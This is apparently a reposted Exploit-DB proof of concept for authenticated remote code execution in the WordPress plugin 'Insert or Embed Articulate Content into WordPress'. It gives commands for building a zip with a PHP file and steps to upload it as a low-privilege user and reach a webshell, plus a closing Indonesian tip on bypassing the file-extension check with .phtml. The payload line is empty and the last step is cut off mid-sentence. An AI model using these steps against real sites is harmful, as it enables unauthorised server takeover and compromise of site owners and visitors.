WordPress Plugin Insert or Embed Articulate Content into WordPress - Remote Code Execution

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# Exploit Title: Authenticated code execution in `insert-or-embed-articulate-content-into-wordpress` Wordpress plugin
# Description: It is possible to upload and execute a PHP file using the plugin option to upload a zip archive
# Date: june 2019
# Exploit Author: xulchibalraa
# Vendor Homepage: https://wordpress.org/plugins/insert-or-embed-articulate-content-into-wordpress/
# Software Link: https://downloads.wordpress.org/plugin/insert-or-embed-articulate-content-into-wordpress.4.2995.zip
# Version: 4.2995 <= 4.2997
# Tested on: Wordpress 5.1.1, PHP 5.6
# CVE : -

## 1. Create a .zip archive with 2 files: index.html, index.php

echo "hello" > index.html
echo "" > index.php
zip poc.zip index.html index.php

## 2. Log in to wp-admin with any user role that has access to the plugin functionality (by default even `Contributors` role have access to it)
## 3. Create a new Post -> Select `Add block` -> E-Learning -> Upload the poc.zip -> Insert as: Iframe -> Insert (just like in tutorial https://youtu.be/knst26fEGCw?t=44 ;)
## 4. Access the webshell from the URL displayed after upload similar to


Source : https://www.exploit-db.com/exploits/46981

nb : Jika kalian gagal upload, silahkan bypass ext index.phtml
cuman itu yg gw Share kali ini, semoga bermanfaat
see you Next Time. Good Luck !!
